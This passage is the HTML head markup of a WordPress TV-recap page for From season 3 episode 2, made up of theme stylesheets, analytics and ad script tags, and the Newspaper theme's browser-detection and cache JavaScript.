var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}
</style>
<link data-minify="1" rel="stylesheet" id="yop-public-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/yop-poll/public/assets/css/yop-poll-public-6.5.33.css?ver=1726249636" type="text/css" media="all">
<link data-minify="1" rel="stylesheet" id="td-plugin-newsletter-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-newsletter/style.css?ver=1726249636" type="text/css" media="all">
<link data-minify="1" rel="stylesheet" id="td-plugin-multi-purpose-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=1726249636" type="text/css" media="all">
<link data-minify="1" crossorigin="anonymous" rel="stylesheet" id="google-fonts-style-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/uploads/omgf/google-fonts-style/google-fonts-style.css?ver=1726249637" type="text/css" media="all">
<link data-minify="1" rel="stylesheet" id="td-theme-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/themes/Newspaper/style.css?ver=1726249637" type="text/css" media="all">
<style id="td-theme-inline-css" type="text/css">@media (max-width:767px){.td-header-desktop-wrap{display:none}}@media (min-width:767px){.td-header-mobile-wrap{display:none}}</style>
<link data-minify="1" rel="stylesheet" id="td-legacy-framework-front-style-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=1726249637" type="text/css" media="all">
<link data-minify="1" rel="stylesheet" id="td-standard-pack-framework-front-style-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=1726249637" type="text/css" media="all">
<link data-minify="1" rel="stylesheet" id="tdb_style_cloud_templates_front-css" href="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=1726249637" type="text/css" media="all">
<style id="rocket-lazyload-inline-css" type="text/css">
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player:focus-within{outline: 2px solid currentColor;outline-offset: 5px;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:100%;width:100%;left:0;top:0;position:absolute;background:url(https://www.tvacute.com/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat center;background-color: transparent !important;cursor:pointer;border:none;}
</style>
<script type="text/javascript" src="https://www.tvacute.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js" defer=""></script>
<script type="text/javascript" src="https://www.tvacute.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js" defer=""></script>
<script type="text/javascript" id="yop-public-js-extra">
/* <![CDATA[ */
var objectL10n = {"yopPollParams":{"urlParams":{"ajax":"https:\/\/www.tvacute.com\/wp-admin\/admin-ajax.php","wpLogin":"https:\/\/www.tvacute.com\/wp-login.php?redirect_to=https%3A%2F%2Fwww.tvacute.com%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Dyop_poll_record_wordpress_vote"},"apiParams":{"reCaptcha":{"siteKey":""},"reCaptchaV2Invisible":{"siteKey":""},"reCaptchaV3":{"siteKey":""},"hCaptcha":{"siteKey":""}},"captchaParams":{"imgPath":"https:\/\/www.tvacute.com\/wp-content\/plugins\/yop-poll\/public\/assets\/img\/","url":"https:\/\/www.tvacute.com\/wp-content\/plugins\/yop-poll\/app.php","accessibilityAlt":"Sound icon","accessibilityTitle":"Accessibility option: listen to a question and answer it!","accessibilityDescription":"Type below the <strong>answer<\/strong> to what you hear. Numbers or words:","explanation":"Click or touch the <strong>ANSWER<\/strong>","refreshAlt":"Refresh\/reload icon","refreshTitle":"Refresh\/reload: get new images and accessibility option!"},"voteParams":{"invalidPoll":"Invalid Poll","noAnswersSelected":"No answer selected","minAnswersRequired":"At least {min_answers_allowed} answer(s) required","maxAnswersRequired":"A max of {max_answers_allowed} answer(s) accepted","noAnswerForOther":"No other answer entered","noValueForCustomField":"{custom_field_name} is required","consentNotChecked":"You must agree to our terms and conditions","noCaptchaSelected":"Captcha is required","thankYou":"Thank you for your vote"},"resultsParams":{"singleVote":"vote","multipleVotes":"votes","singleAnswer":"answer","multipleAnswers":"answers"}}};
/* ]]> */
</script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/plugins/yop-poll/public/assets/js/yop-poll-public-6.5.33.min.js?ver=6.6.2" id="yop-public-js" defer=""></script>


<script type="text/javascript" src="https://www.googletagmanager.com/gtag/js?id=G-H754ZMDZ2G" id="google_gtagjs-js" async=""></script>
<script type="text/javascript" id="google_gtagjs-js-after">
/* <![CDATA[ */
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag("set","linker",{"domains":["www.tvacute.com"]});
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "G-H754ZMDZ2G");
/* ]]> */
</script>

<meta name="generator" content="Site Kit by Google 1.136.0"><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://www.tvacute.com/from-season-3-episode-2-recap/?amp=1"> <script>
        window.tdb_global_vars = {"wpRestUrl":"https:\/\/www.tvacute.com\/wp-json\/","permalinkStructure":"\/%postname%\/"};
        window.tdb_p_autoload_vars = {"isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
<style id="tdb-global-colors">:root{--today-news-dark-bg:#000000;--today-news-accent:#CE0000;--today-news-white:#FFFFFF;--today-news-white-transparent:rgba(255,255,255,0.75);--today-news-white-transparent2:rgba(255,255,255,0.1);--today-news-dark-gray:#222222;--today-news-light-gray:#d8d8d8}</style>
<link rel="amphtml" href="https://www.tvacute.com/from-season-3-episode-2-recap/?amp=1"><style>#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;-webkit-text-decoration:none;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{-webkit-text-decoration:underline;text-decoration:underline}</style>

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    // td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }

        // td_js_generator - mini detector
        ( function () {
            var htmlTag = document.getElementsByTagName("html")[0];

	        if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

	        if ( navigator.userAgent.indexOf("Edge") > -1 ) {
                htmlTag.className += ' ieEdge';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();

        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img, .td-lazy-img";
var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img, .td-animation-stack .td-lazy-img";
var tdc_is_installed="yes";
var td_ajax_url="https:\/\/www.tvacute.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=12.6.3";
var td_get_template_directory_uri="https:\/\/www.tvacute.com\/wp-content\/plugins\/td-composer\/legacy\/common";
var tds_snap_menu="";
var tds_logo_on_sticky="";
var tds_header_style="3";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var td_user_incorrect="Username incorrect!";
var td_email_user_empty="Email or username empty!";
var td_pass_empty="Pass empty!";
var td_pass_pattern_incorrect="Invalid Pass Pattern!";
var td_retype_pass_incorrect="Retyped Pass incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="1";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_captcha="";
var tds_theme_color_site_wide="#fb4c7d";
var tds_smart_sidebar="";
var tdThemeName="Newspaper";
var tdThemeNameWl="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var tdBlockNonce="bf383934f5";
var tdMobileMenu="enabled";
var tdMobileSearch="enabled";
var tdDateNamesI18n={"month_names":["January","February","March","April","May","June","July","August","September","October","November","December"],"month_names_short":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"day_names":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"day_names_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]};
var tdb_modal_confirm="Save";
var tdb_modal_cancel="Cancel";
var tdb_modal_confirm_alt="Yes";
var tdb_modal_cancel_alt="No";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>

<style>:root{--td_theme_color:#fb4c7d;--td_slider_text:rgba(251,76,125,0.7)}.td-header-style-12 .td-header-menu-wrap-full,.td-header-style-12 .td-affix,.td-grid-style-1.td-hover-1 .td-big-grid-post:hover .td-post-category,.td-grid-style-5.td-hover-1 .td-big-grid-post:hover .td-post-category,.td_category_template_3 .td-current-sub-category,.td_category_template_8 .td-category-header .td-category a.td-current-sub-category,.td_category_template_4 .td-category-siblings .td-category a:hover,.td_block_big_grid_9.td-grid-style-1 .td-post-category,.td_block_big_grid_9.td-grid-style-5 .td-post-category,.td-grid-style-6.td-hover-1 .td-module-thumb:after,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>li>a:hover,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.sfHover>a{background-color:#fb4c7d}.td_mega_menu_sub_cats .cur-sub-cat,.td-mega-span h3 a:hover,.td_mod_mega_menu:hover .entry-title a,.header-search-wrap .result-msg a:hover,.td-header-top-menu .td-drop-down-search .td_module_wrap:hover .entry-title a,.td-header-top-menu .td-icon-search:hover,.td-header-wrap .result-msg a:hover,.top-header-menu li a:hover,.top-header-menu .current-menu-item>a,.top-header-menu .current-menu-ancestor>a,.top-header-menu .current-category-ancestor>a,.td-social-icon-wrap>a:hover,.td-header-sp-top-widget .td-social-icon-wrap a:hover,.td_mod_related_posts:hover h3>a,.td-post-template-11 .td-related-title .td-related-left:hover,.td-post-template-11 .td-related-title .td-related-right:hover,.td-post-template-11 .td-related-title .td-cur-simple-item,.td-post-template-11 .td_block_related_posts .td-next-prev-wrap a:hover,.td-category-header .td-pulldown-category-filter-link:hover,.td-category-siblings .td-subcat-dropdown a:hover,.td-category-siblings .td-subcat-dropdown a.td-current-sub-category,.footer-text-wrap .footer-email-wrap a,.footer-social-wrap a:hover,.td_module_17 .td-read-more a:hover,.td_module_18 .td-read-more a:hover,.td_module_19 .td-post-author-name a:hover,.td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more span,.td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more i,.td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more span,.td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more i,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.sfHover>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>li>a:hover{color:#fb4c7d}.td-mega-menu-page .wpb_content_element ul li a:hover,.td-theme-wrap .td-aj-search-results .td_module_wrap:hover .entry-title a,.td-theme-wrap .header-search-wrap .result-msg a:hover{color:#fb4c7d!important}.td_category_template_8 .td-category-header .td-category a.td-current-sub-category,.td_category_template_4 .td-category-siblings .td-category a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-item>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>li>a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.sfHover>a{border-color:#fb4c7d}.td-header-wrap .td-header-menu-wrap-full,.td-header-menu-wrap.td-affix,.td-header-style-3 .td-header-main-menu,.td-header-style-3 .td-affix .td-header-main-menu,.td-header-style-4 .td-header-main-menu,.td-header-style-4 .td-affix .td-header-main-menu,.td-header-style-8 .td-header-menu-wrap.td-affix,.td-header-style-8 .td-header-top-menu-full{background-color:#fb4c7d}.td-boxed-layout .td-header-style-3 .td-header-menu-wrap,.td-boxed-layout .td-header-style-4 .td-header-menu-wrap,.td-header-style-3 .td_stretch_content .td-header-menu-wrap,.td-header-style-4 .td_stretch_content .td-header-menu-wrap{background-color:#fb4c7d!important}@media (min-width:1019px){.td-header-style-1 .td-header-sp-recs,.td-header-style-1 .td-header-sp-logo{margin-bottom:28px}}@media (min-width:768px) and (max-width:1018px){.td-header-style-1 .td-header-sp-recs,.td-header-style-1 .td-header-sp-logo{margin-bottom:14px}}.td-header-style-7 .td-header-top-menu{border-bottom:none}.sf-menu>.current-menu-item>a:after,.sf-menu>.current-menu-ancestor>a:after,.sf-menu>.current-category-ancestor>a:after,.sf-menu>li:hover>a:after,.sf-menu>.sfHover>a:after,.td_block_mega_menu .td-next-prev-wrap a:hover,.td-mega-span .td-post-category:hover,.td-header-wrap .black-menu .sf-menu>li>a:hover,.td-header-wrap .black-menu .sf-menu>.current-menu-ancestor>a,.td-header-wrap .black-menu .sf-menu>.sfHover>a,.td-header-wrap .black-menu .sf-menu>.current-menu-item>a,.td-header-wrap .black-menu .sf-menu>.current-menu-ancestor>a,.td-header-wrap .black-menu .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>li>a:hover,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.sfHover>a{background-color:#232323}.td_block_mega_menu .td-next-prev-wrap a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-item>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>li>a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.sfHover>a{border-color:#232323}.header-search-wrap .td-drop-down-search:before{border-color:transparent transparent #232323 transparent}.td_mega_menu_sub_cats .cur-sub-cat,.td_mod_mega_menu:hover .entry-title a,.td-theme-wrap .sf-menu ul .td-menu-item>a:hover,.td-theme-wrap .sf-menu ul .sfHover>a,.td-theme-wrap .sf-menu ul .current-menu-ancestor>a,.td-theme-wrap .sf-menu ul .current-category-ancestor>a,.td-theme-wrap .sf-menu ul .current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>li>a:hover,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.sfHover>a{color:#232323}.td-header-wrap .td-logo-text-container .td-logo-text{color:#fb4c7d}.td-footer-wrapper,.td-footer-wrapper .td_block_template_7 .td-block-title>*,.td-footer-wrapper .td_block_template_17 .td-block-title,.td-footer-wrapper .td-block-title-wrap .td-wrapper-pulldown-filter{background-color:#111111}.td-sub-footer-container{background-color:#111111}:root{--td_theme_color:#fb4c7d;--td_slider_text:rgba(251,76,125,0.7)}.td-header-style-12 .td-header-menu-wrap-full,.td-header-style-12 .td-affix,.td-grid-style-1.td-hover-1 .td-big-grid-post:hover .td-post-category,.td-grid-style-5.td-hover-1 .td-big-grid-post:hover .td-post-category,.td_category_template_3 .td-current-sub-category,.td_category_template_8 .td-category-header .td-category a.td-current-sub-category,.td_category_template_4 .td-category-siblings .td-category a:hover,.td_block_big_grid_9.td-grid-style-1 .td-post-category,.td_block_big_grid_9.td-grid-style-5 .td-post-category,.td-grid-style-6.td-hover-1 .td-module-thumb:after,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>li>a:hover,.tdm-menu-active-style5 .td-header-menu-wrap .sf-menu>.sfHover>a{background-color:#fb4c7d}.td_mega_menu_sub_cats .cur-sub-cat,.td-mega-span h3 a:hover,.td_mod_mega_menu:hover .entry-title a,.header-search-wrap .result-msg a:hover,.td-header-top-menu .td-drop-down-search .td_module_wrap:hover .entry-title a,.td-header-top-menu .td-icon-search:hover,.td-header-wrap .result-msg a:hover,.top-header-menu li a:hover,.top-header-menu .current-menu-item>a,.top-header-menu .current-menu-ancestor>a,.top-header-menu .current-category-ancestor>a,.td-social-icon-wrap>a:hover,.td-header-sp-top-widget .td-social-icon-wrap a:hover,.td_mod_related_posts:hover h3>a,.td-post-template-11 .td-related-title .td-related-left:hover,.td-post-template-11 .td-related-title .td-related-right:hover,.td-post-template-11 .td-related-title .td-cur-simple-item,.td-post-template-11 .td_block_related_posts .td-next-prev-wrap a:hover,.td-category-header .td-pulldown-category-filter-link:hover,.td-category-siblings .td-subcat-dropdown a:hover,.td-category-siblings .td-subcat-dropdown a.td-current-sub-category,.footer-text-wrap .footer-email-wrap a,.footer-social-wrap a:hover,.td_module_17 .td-read-more a:hover,.td_module_18 .td-read-more a:hover,.td_module_19 .td-post-author-name a:hover,.td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more span,.td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more i,.td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more span,.td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more i,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.sfHover>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>li>a:hover{color:#fb4c7d}.td-mega-menu-page .wpb_content_element ul li a:hover,.td-theme-wrap .td-aj-search-results .td_module_wrap:hover .entry-title a,.td-theme-wrap .header-search-wrap .result-msg a:hover{color:#fb4c7d!important}.td_category_template_8 .td-category-header .td-category a.td-current-sub-category,.td_category_template_4 .td-category-siblings .td-category a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-item>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>li>a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.sfHover>a{border-color:#fb4c7d}.td-header-wrap .td-header-menu-wrap-full,.td-header-menu-wrap.td-affix,.td-header-style-3 .td-header-main-menu,.td-header-style-3 .td-affix .td-header-main-menu,.td-header-style-4 .td-header-main-menu,.td-header-style-4 .td-affix .td-header-main-menu,.td-header-style-8 .td-header-menu-wrap.td-affix,.td-header-style-8 .td-header-top-menu-full{background-color:#fb4c7d}.td-boxed-layout .td-header-style-3 .td-header-menu-wrap,.td-boxed-layout .td-header-style-4 .td-header-menu-wrap,.td-header-style-3 .td_stretch_content .td-header-menu-wrap,.td-header-style-4 .td_stretch_content .td-header-menu-wrap{background-color:#fb4c7d!important}@media (min-width:1019px){.td-header-style-1 .td-header-sp-recs,.td-header-style-1 .td-header-sp-logo{margin-bottom:28px}}@media (min-width:768px) and (max-width:1018px){.td-header-style-1 .td-header-sp-recs,.td-header-style-1 .td-header-sp-logo{margin-bottom:14px}}.td-header-style-7 .td-header-top-menu{border-bottom:none}.sf-menu>.current-menu-item>a:after,.sf-menu>.current-menu-ancestor>a:after,.sf-menu>.current-category-ancestor>a:after,.sf-menu>li:hover>a:after,.sf-menu>.sfHover>a:after,.td_block_mega_menu .td-next-prev-wrap a:hover,.td-mega-span .td-post-category:hover,.td-header-wrap .black-menu .sf-menu>li>a:hover,.td-header-wrap .black-menu .sf-menu>.current-menu-ancestor>a,.td-header-wrap .black-menu .sf-menu>.sfHover>a,.td-header-wrap .black-menu .sf-menu>.current-menu-item>a,.td-header-wrap .black-menu .sf-menu>.current-menu-ancestor>a,.td-header-wrap .black-menu .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>li>a:hover,.tdm-menu-active-style5 .tdm-header .td-header-menu-wrap .sf-menu>.sfHover>a{background-color:#232323}.td_block_mega_menu .td-next-prev-wrap a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-item>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style4 .tdm-header .sf-menu>li>a:hover,.tdm-menu-active-style4 .tdm-header .sf-menu>.sfHover>a{border-color:#232323}.header-search-wrap .td-drop-down-search:before{border-color:transparent transparent #232323 transparent}.td_mega_menu_sub_cats .cur-sub-cat,.td_mod_mega_menu:hover .entry-title a,.td-theme-wrap .sf-menu ul .td-menu-item>a:hover,.td-theme-wrap .sf-menu ul .sfHover>a,.td-theme-wrap .sf-menu ul .current-menu-ancestor>a,.td-theme-wrap .sf-menu ul .current-category-ancestor>a,.td-theme-wrap .sf-menu ul .current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-item>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-menu-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.current-category-ancestor>a,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>li>a:hover,.tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu>.sfHover>a{color:#232323}.td-header-wrap .td-logo-text-container .td-logo-text{color:#fb4c7d}.td-footer-wrapper,.td-footer-wrapper .td_block_template_7 .td-block-title>*,.td-footer-wrapper .td_block_template_17 .td-block-title,.td-footer-wrapper .td-block-title-wrap .td-wrapper-pulldown-filter{background-color:#111111}.td-sub-footer-container{background-color:#111111}</style>

<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-H754ZMDZ2G"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-H754ZMDZ2G');
</script>

<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/prebid_hb_883_1254.js?ver=1726249636" async=""> </script>

<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8058393775546814" crossorigin="anonymous"></script>

<script type="rocketlazyloadscript" data-minify="1" async="" custom-element="amp-auto-ads" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/v0/amp-auto-ads-0.1.js?ver=1726249636">
</script>
<script type="rocketlazyloadscript" data-minify="1" async="" custom-element="amp-ad" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/v0/amp-ad-0.1.js?ver=1726249637"></script>
<style type="text/css" id="wp-custom-css">
			.sticky-ads {
	position: sticky !important;
	top: 0;
}

/* Blockquotes */

.article-bq {
text-align: left; 
color: #242223;
font-size: 1.25em;
line-height: 1.5em;
font-weight: 500; 
background: #fc7796; 
padding: 20px; 
margin-left: 20px;	
border-left: 4px solid #dd0606;
}

/* Mgid Titles Color */

.mghead {
    color: #dd0606 !important;
}

/* Footer Background Color */
.td-footer-template-wrap {
background: #ffffff;
}


		</style>

<style>.tdm-btn-style1{background-color:#fb4c7d}.tdm-btn-style2:before{border-color:#fb4c7d}.tdm-btn-style2{color:#fb4c7d}.tdm-btn-style3{-webkit-box-shadow:0 2px 16px #fb4c7d;-moz-box-shadow:0 2px 16px #fb4c7d;box-shadow:0 2px 16px #fb4c7d}.tdm-btn-style3:hover{-webkit-box-shadow:0 4px 26px #fb4c7d;-moz-box-shadow:0 4px 26px #fb4c7d;box-shadow:0 4px 26px #fb4c7d}</style>
